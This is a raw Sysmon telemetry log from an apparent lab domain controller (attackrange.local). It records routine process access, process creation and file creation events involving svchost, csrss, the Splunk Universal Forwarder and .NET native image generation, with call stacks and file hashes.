13:22:18.418{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006428Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:18.418{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006427Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:18.418{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006426Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:18.418{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-458A-6000-4F02-000000009A01}2440C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006425Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:18.418{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-458A-6000-4F02-000000009A01}2440C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000006424Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:18.418{08A6967A-458A-6000-4F02-000000009A01}2440C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000006455Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:19.981{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-458B-6000-5102-000000009A01}4432C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006454Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:19.981{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-458B-6000-5102-000000009A01}4432C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006453Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:19.981{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-458B-6000-5102-000000009A01}4432C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006452Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:22:19.778{08A6967A-4587-6000-4B02-000000009A01}3968C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\f80-0\System.Activities.Presentation.dll2021-01-14 13:22:19.778 10341000x80000000000000006451Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:19.246{08A6967A-458B-6000-5002-000000009A01}46524940C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006450Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:19.090{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-458B-6000-5002-000000009A01}4652C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006449Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:19.090{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006448Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:19.090{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006447Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:19.090{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006446Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:19.090{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006445Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:19.090{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006444Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:19.090{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006443Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:19.090{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006442Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:19.090{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006441Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:19.090{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006440Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:19.090{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-458B-6000-5002-000000009A01}4652C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006439Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:19.090{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-458B-6000-5002-000000009A01}4652C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000006438Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:19.091{08A6967A-458B-6000-5002-000000009A01}4652C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000006485Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:20.918{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-458C-6000-5702-000000009A01}2820C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006484Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:20.903{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-458C-6000-5702-000000009A01}2820C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006483Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:22:20.903{08A6967A-44E2-6000-3201-000000009A01}22202424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-458C-6000-5702-000000009A01}2820C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006482Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 